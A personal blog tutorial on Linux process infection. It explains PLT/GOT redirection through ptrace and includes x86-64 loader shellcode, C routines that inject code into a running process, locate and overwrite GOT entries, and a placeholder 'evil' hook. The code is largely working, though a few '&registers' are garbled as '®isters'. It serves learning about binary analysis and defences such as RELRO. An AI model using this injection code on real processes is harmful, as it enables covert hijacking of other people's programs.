This document was written specifically for educational purposes. I must emphasise the fact that the infection techniques and algorithms discussed within this document are already well known and have also been thoroughly detailed within other resources available on the internet.
This document outlines the Linux virus techniques I've learnt and implemented in order to hijack shared library functions within a program that is in the midst of execution. More specifically, it details how to divert the execution of an existing process, make it execute potentially malicious code that has been injected into the process address space, and then have execution control restored accordingly. This infection technique is commonly referred to as PLT/GOT redirection.
If you don't care about how I ended up going down this rabbit hole, then feel free to skip this entire section and start here.
This is my first attempt at writing a technical piece of work, so please take that into consideration when reading through this document.Just to give you some insight into how I fell into this rabbit hole and started to learn about UNIX viruses, reverse engineering, and the enormous amount of other mind bamboozling things that come along the way, I thought that I'd share a little story with you. Feel free to skip over this section if you don't like stories, but I thought it was a rather interesting how I've come from not knowing anything about Linux infection techniques to someone that has developed a basic understanding on this particular topic in addition to some of the interrelated topics that come with learning about Linux viruses and binary analysis.
Towards the end of 2017 my colleague (@steve2) and I were discussing stuff at work, as you normally do. The topic of "breaking into things" arose, and by the term "things", we were literally referring to compromising systems and how attackers use their strategies and techniques to essentially "steal credentials" and "own shit". Honestly speaking, I've never exploited a system or network and even if I have, I necessarily wouldn't confess it on here. Anyway, my colleague (@steve2) who has an extensive amount of knowledge on computer security asked me a very simple question, it was along the lines of "How would you go about changing changing your shell environment variable that has been initialized to be READONLY?". I replied "I don't know, but let me think about it and I'll get back to you". As an enthusiastic security engineer, I went away and started brainstorming about all the different ways I could achieve this. On the train commute home, I could only think about using a debugger and some how attaching myself to the shell process and altering the memory contents, or either invoking a function that would unset the environment variable that I specified. But how? I didn't know how to use a debugger effectively nor could I comprehend what disassembled binary even looks like, or how the Linux kernel loads the different programs segments into memory. At that point I come to terms with the fact that it's going to be a steep learning curve, and I yet have a lot to learn. I didn't end up solving the problem that very same evening. The following day my colleague asked "Did you manage to solve that little exercise we spoke about yesterday?", I simply responded with "No" feeling rather embarrassed.
The conversation then spiralled off into something completely random and eventually returning back with another question, which was along the lines of "Have you ever heard of ptrace?". Again, I responded with "Eh, no" and at this point I really felt embarrassed, because I felt as though I should already know about all these wonderful "utilities" and how to effectively use them. He responded and it was something along the lines of "Dude, literally go and read the man page for the ptrace system call". I replied "Sure, no worries" and went to enter `man ptrace` into one of my shells. All it took was for me to read the very first sentence, which is along the lines of "The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "tracee"), and examine and change the tracee's memory and registers.". At this point, my mind was literally stuck in a endless loop where each iteration was a new idea on how I could use this system call to do some really "interesting" things. One of the first things that came to my mind was how on earth could I subvert the SSH daemon into doing something that it was never designed to do.
For information about the ELF file format, I highly encourage you to read through the ELF specification.
The assembly code provided below, once assembled and linked, is what we commonly refer to as "shellcode". Shellcode is typically a sequence of self contained machine instructions that must be ready to take control of the processor regardless of the current processor state. The term "shellcode" does not necessarily mean and that the purpose of the instructions is to spawn a shell per se, but rather has become a more generic term used to describe a segment of position independent code that can executed directly by the CPU.
When shell code is injected into a running process, it takes over like a biological virus inside a body and this is exactly what the below assembly code has been designed to do but in the context of computer programs. The primary objective of the shellcode below is to map a shared object file into the process that executes it. The technique used within this shellcode relies on two system calls open() and mmap() in order to load the shared object file into memory. Although this is a simple, clean, and effective means of loading your parasite code into a program image, it does have its drawbacks. The problem with this technique is that most shared libraries you'd want to load require relocations in order to execute correctly, so in order for the shared library to work using this simple method you will need to write the code so that it is completely position-independent. Within some of my upcoming posts I'm looking to explore how to use the wrapper functions such as __libc_dlopen_mode() and __libc_dlsym() made available within GLIBC so that the dynamic linker can be invoked from the program and have it perform all the relocations.
I've detailed the path of execution for the parasite loader below and have provided the assembler code and disassemblies for reference.
Use the short relative JMP instruction to transfer control to the instruction referenced by the label 'do_call'.
jmp short do_call
Branch to the procedure location referenced by the 'jmp_back' label. The use of the CALL instruction here ensures that the value of the RIP register, which in this case is the offset of the instruction following the CALL instruction is pushed onto the stack. The offset address in this particular instance contains the string constant that represents the absolute path of the file to be mappeed into the program image address space.
call jmp_back library: db "/lib/library.so.1.0", 00
Prepare the registers with the values required for the sys_open system call and pass control to the kernel by issuing the 'syscall' instruction. The use of the POP instruction here is to obtain the offset address of the string constant.
pop rdi xor rsi, rsi xor rax, rax mov al, 0x2 syscall
Prepare the registers with the values required for the sys_mmap system call and again pass control to the kernel by issuing the 'syscall' instruction.
xor rdi, rdi xor rsi, rsi mov si, 0x2000 xor rdx, rdx mov dl, 0x7 xor r10, r10 mov r10b, 0x2 xor r8, r8 mov r8b, al xor r9, r9 xor rax, rax mov al, 0x9 syscall
Finish with an 'int3' instruction so that the process which the shellcode is executing in sends a signal - SIGTRAP. This allows the attached program to take back control and restore execution.
int3
The complete assembly source code for the parasite loader is provided below.
; Assembly code that invokes the Linux sys_open and sys_mmap system calls in ; order to inject the shared object into a processes address space. ; ; Author: Matthew Bobrowski ; Build: ; nasm -f elf64 parasite.asm ; ld -o parasite parasite.o section .text ; The _start symbol must be declared for the linker program (ld) global _start _start: ; Small nop-sled used as a safe-guard when diverting execution nop nop nop nop jmp short do_call jmp_back: ; Prepare arguments for the sys_open system call ; - rdi: pointer to string ; - rsi: file access mode (O_RDONLY) ; - rax: system call number (sys_open) pop rdi xor rsi, rsi xor rax, rax mov al, 0x2 ; Execute the sys_open system call syscall ; Prepare arguments for the sys_mmap system call ; - rdi: starting address of mapped file (NULL, allow kernel to choose) ; - rsi: length of bytes starting at offset (8192 bytes) ; - rdx: protection of mapping (PROT_EXEC | PROT_READ | PROT_WRITE) ; - r10: mapped memory visibility (MAP_PRIVATE) ; - r8: file descriptor returned by sys_open ; - r9: starting offset (0) ; - rax: sys_mmap xor rdi, rdi xor rsi, rsi mov si, 0x2000 xor rdx, rdx mov dl, 0x7 xor r10, r10 mov r10b, 0x2 xor r8, r8 mov r8b, al xor r9, r9 xor rax, rax mov al, 0x9 ; Execute the sys_mmap system call syscall ; Signal (SIGTRAP) a breakpoint to the debugger to restore execution int3 do_call: call jmp_back library: db "/lib/library.so.1.0", 00
Below is the disassembly of the compiled source code above.
parasite: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 <_start>: 400080: eb 31 jmp 4000b3 0000000000400082 : 400082: 5f pop rdi 400083: 48 31 f6 xor rsi,rsi 400086: 48 31 c0 xor rax,rax 400089: b0 02 mov al,0x2 40008b: 0f 05 syscall 40008d: 48 31 ff xor rdi,rdi 400090: 48 31 f6 xor rsi,rsi 400093: 66 be 00 20 mov si,0x2000 400097: 48 31 d2 xor rdx,rdx 40009a: b2 07 mov dl,0x7 40009c: 4d 31 d2 xor r10,r10 40009f: 41 b2 02 mov r10b,0x2 4000a2: 4d 31 c0 xor r8,r8 4000a5: 41 88 c0 mov r8b,al 4000a8: 4d 31 c9 xor r9,r9 4000ab: 48 31 c0 xor rax,rax 4000ae: b0 09 mov al,0x9 4000b0: 0f 05 syscall 4000b2: cc int3 00000000004000b3 : 4000b3: e8 ca ff ff ff call 400082 00000000004000b8 : 4000b8: 2f (bad) 4000b9: 6c ins BYTE PTR es:[rdi],dx 4000ba: 69 62 2f 6c 69 62 72 imul esp,DWORD PTR [rdx+0x2f],0x7262696c 4000c1: 61 (bad) 4000c2: 72 79 jb 40013d 4000c4: 2e 73 6f cs jae 400136 4000c7: 2e 31 2e xor DWORD PTR cs:[rsi],ebp 4000ca: 30 00 xor BYTE PTR [rax],al ^ ^ ^ Address Opcode / Instruction Assembly
This section explores how to inject the shellcode and divert the execution of the running process to code that we control. The code injection and execution diversion techniques discussed here are acheived by using the ptrace system call made available on Unix and Unix-like operating systems. In essence, ptrace is a versatile and rather complex interface that allows one process to control the execution of another and to peek and poke at its innards. I'll only be covering a subset of the ptrace system call control mechanisms within this document, so for those who are curious minded and are interested to see what else the ptrace system call is capable of and how it pertains to working with process images, I'd highly encourage you to read through the ptrace man page.
Prior to being able to execute the shellcode and have the process load the shared object file into its address space, we need to inject the loader into the process image. The stack may potentially work for this purpose, however some systems enforce protection mechanisms on the stack portion of the process's virtual address space marking it non-executable, so that attack code injected onto the stack cannot be executed. In Linux kernels that are not patched with PaX the default bahaviour for ptrace is such that it permits the tracer to write to memory segments that have been loaded as non-writable. Seeing as though the Linux kernel that I'm currently working on hasn't had the PaX patches applied, it would be wise to use the text segment and overwrite the first sizeof(shellcode) with our shellcode starting at the base address 0x400000. This is the default base address of the text segment for an ELF built for x86_64 platforms.
Upon attaching to the process via PTRACE_ATTACH, the following steps need to be performed:
The source code below is the implementation of the above diversion and restoration procedure.
static long loader(pid_t pid) { long base; int status; long buffer[16]; unsigned char *p; unsigned char text[128]; unsigned long offset = 0x400000; struct user_regs_struct registers; unsigned long rip; unsigned long rax; unsigned long rdx; unsigned long rsi; unsigned long rdi; unsigned long r8; unsigned long r9; unsigned long r10; ptrace_peektext(pid, offset, buffer, 128); p = (unsigned char *) buffer; memcpy(text, p, 128); ptrace_poketext(pid, offset, (long *) shellcode, sizeof(shellcode)); if (ptrace(PTRACE_GETREGS, pid, NULL, ®isters) == -1) { perror("ptrace(PTRACE_GETREGS)"); exit(EXIT_FAILURE); } rip = registers.rip; rax = registers.rax; rdx = registers.rdx; rsi = registers.rsi; rdi = registers.rdi; r8 = registers.r8; r9 = registers.r9; r10 = registers.r10; registers.rip = offset + 2; if (ptrace(PTRACE_SETREGS, pid, NULL, ®isters) == -1) { perror("ptrace(PTRACE_SETREGS)"); exit(EXIT_FAILURE); } if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) { perror("ptrace(PTRACE_CONT)"); exit(EXIT_FAILURE); } do { wait(&status); } while (WIFSTOPPED(status) && WSTOPSIG(status) != SIGTRAP); if (ptrace(PTRACE_GETREGS, pid, NULL, ®isters) == -1) { perror("ptrace(PTRACE_GETREGS)"); exit(EXIT_FAILURE); } ptrace_poketext(pid, offset, (long *) text, 128); base = registers.rax; registers.rip = rip; registers.rax = rax; registers.rdx = rdx; registers.rsi = rsi; registers.rdi = rdi; registers.r8 = r8; registers.r9 = r9; registers.r10 = r10; if (ptrace(PTRACE_SETREGS, pid, NULL, ®isters) == -1) { perror("ptrace(PTRACE_SETREGS)"); exit(EXIT_FAILURE); } return base; }
This section provides the semantic details on how the shared library functions that are referenced within the programs text segment can be hijacked. The GOT is a section that resides within the data segment of the program image. It is a table predominantly comprised of function pointers to shared library functions that have been resolved by the dynamic linking process. Typically, the GOT is writable, which means that it is both attractive and practical for an attacker to overwrite a function pointer GOT entry with an address to their code. Upon successfully modifying the the GOT entry, next time the shared library function is called within the program you could expect the control flow to be redirected to something other than the original shared library function. You may potentially be thinking about whether there are mitigation techniques available to harden the data sections within a process image. There certainly is, and the technique can be referred to as RELRO (read-only relocation). I'm not going to cover this within this document, however I encourage you to read about it as it is certainly interesting and something to be aware of.
Firstly, in order to patch the GOT entry with the address of our code, we need to determine the name of the shared library function we would like to hijack and find the correlated offset address of the GOT entry. If we look at the structure of a relocation entry we can see that it provides two useful fields labelled 'r_offset' and 'r_info'. In this particular instance the value of the 'r_offset' field provides the virtual memory address that the dynamic linker used to perform the necessary relocation action, and the 'r_info' field provides a means of obtaining the correlated symbol from the symbol table via the helper routine ELF64_R_SYM((i) >> 8). The function below iterates through each of the relocation entries that are found within the DT_JMPREL. On each relocation entry the associated symbol is obtained from DT_SYMTAB using the 'r_info' field and checked against the shared library function name provided to it as an argument. If there is a match, the 'r_offset' value is returned back to the caller.
static Elf64_Addr relocation_offset(pid_t pid, const char *name, Elf64_Addr address) { int i, count; Elf64_Addr base; Elf64_Addr relocs; Elf64_Addr symtab; Elf64_Addr strtab; Elf64_Xword size; Elf64_Dyn *dyn; Elf64_Rela *rela; Elf64_Ehdr *e_hdr; Elf64_Phdr *p_hdr; base = address; dyn = malloc(sizeof(Elf64_Dyn)); rela = malloc(sizeof(Elf64_Rela)); e_hdr = malloc(sizeof(Elf64_Ehdr)); p_hdr = malloc(sizeof(Elf64_Phdr)); ptrace_peektext(pid, base, e_hdr, sizeof(Elf64_Ehdr)); base += e_hdr->e_phoff; do { ptrace_peektext(pid, base, p_hdr, sizeof(Elf64_Phdr)); base += sizeof(Elf64_Phdr); } while (p_hdr->p_type != PT_DYNAMIC); base = p_hdr->p_vaddr; do { ptrace_peektext(pid, base, dyn, sizeof(Elf64_Dyn)); switch (dyn->d_tag) { case DT_SYMTAB: symtab = dyn->d_un.d_ptr; break; case DT_STRTAB: strtab = dyn->d_un.d_ptr; break; case DT_PLTRELSZ: size = dyn->d_un.d_val; break; case DT_JMPREL: relocs = dyn->d_un.d_ptr; break; default: break; } base += sizeof(Elf64_Dyn); } while (dyn->d_tag != DT_NULL); i = 0; count = size / sizeof(Elf64_Rela); do { int index; char buff[40]; Elf64_Sym symbol; ptrace_peektext(pid, relocs, rela, sizeof(Elf64_Rela)); index = ELF64_R_SYM(rela->r_info); ptrace_peektext(pid, (symtab + (index * sizeof(Elf64_Sym))), &symbol, sizeof(Elf64_Sym)); ptrace_peektext(pid, strtab + symbol.st_name, buff, sizeof(buff)); if (strcmp(name, buff) == 0) { return rela->r_offset; } i++; relocs += sizeof(Elf64_Rela); } while (i < count); return 0; }
Once the offset address of the relocation entry is returned by this function, the associated GOT entry for this shared library call can be patched accordingly. We can simply use ptrace(PTRACE_POKETEXT, ...) in order to perform this update i.e.
ptrace_poketext(pid, reloc, &patch, sizeof(Elf64_Addr));
Prior to updating the GOT entry function pointer address, it is imperative that the current function pointer stored in that address location is stored away for later use. It is highly likely that the address that resides in that location prior to the manual overwrite is the dynamically resolved function pointer address populated by the dynamic linker itself.
Once control has been passed to the arbitrary function, we need to implement a mechanism that will allow us to pass execution back to the original shared library function. The malicious code has been designed to include a function pointer stub, which is intended to be replaced with the address of the original function.
static long evil() { char value[10]; value[0] = 'I'; value[1] = 'n'; value[2] = 'f'; value[3] = 'e'; value[4] = 'c'; value[5] = 't'; value[6] = 'e'; value[7] = 'd'; value[8] = '\0'; long (*original)(char *buffer) = 0x7fffffffffff; original(value); }
Locate the sequence of bytes that are to be patched by looking at the function disassembly.
library.so.1.0: file format elf64-x86-64 Disassembly of section .text: 0000000000000211 : 211: 55 push rbp 212: 48 89 e5 mov rbp,rsp 215: 48 83 ec 20 sub rsp,0x20 219: c6 45 e0 49 mov BYTE PTR [rbp-0x20],0x49 21d: c6 45 e1 6e mov BYTE PTR [rbp-0x1f],0x6e 221: c6 45 e2 66 mov BYTE PTR [rbp-0x1e],0x66 225: c6 45 e3 65 mov BYTE PTR [rbp-0x1d],0x65 229: c6 45 e4 63 mov BYTE PTR [rbp-0x1c],0x63 22d: c6 45 e5 74 mov BYTE PTR [rbp-0x1b],0x74 231: c6 45 e6 65 mov BYTE PTR [rbp-0x1a],0x65 235: c6 45 e7 64 mov BYTE PTR [rbp-0x19],0x64 239: c6 45 e8 00 mov BYTE PTR [rbp-0x18],0x0 23d: 48 b8 ff ff ff ff ff movabs rax,0x7fffffffffff 244: 7f 00 00 247: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax 24b: 48 8d 55 e0 lea rdx,[rbp-0x20] 24f: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8] 253: 48 89 d7 mov rdi,rdx 256: ff d0 call rax 258: c9 leave 259: c3 ret
After the byte sequence "\xe8\x00\x48\xb8" in the above dissasembly we patch the stub with original function address. In the code below once the signature is located we patch the code at (offset + i) using ptrace(PTRACE_POKETEXT, ...).
static int patch_function(pid_t pid, Elf64_Addr offset, Elf64_Addr address) { int i, len; uint8_t buff[80]; uint8_t transfer[] = "\xe8\00\x48\xb8"; ptrace_peektext(pid, offset, buff, sizeof(buff)); for (i = 0, len = sizeof(buff); i < len; i++) { if (buff[i] == transfer[0] && buff[i + 1] == transfer[1] && buff[i + 2] == transfer[2] && buff[i + 3] == transfer[3]) { ptrace_poketext(pid, (offset + i) + 4, &address, sizeof(Elf64_Addr)); return 0; } } return -1; }
Now that there is means of diverting execution through a hijacked shared library function and passing execution back, we can safely detach from the tracee process and allowed it to continue.
ptrace(PTRACE_DETACH, pid, NULL, NULL);
I'd like to thank both @elfmaster and @silviocesare for the phenomenal work they've done in the Linux virus space.
You can clone/download the latest version of the software from my GitHub. The repository URL can be found below.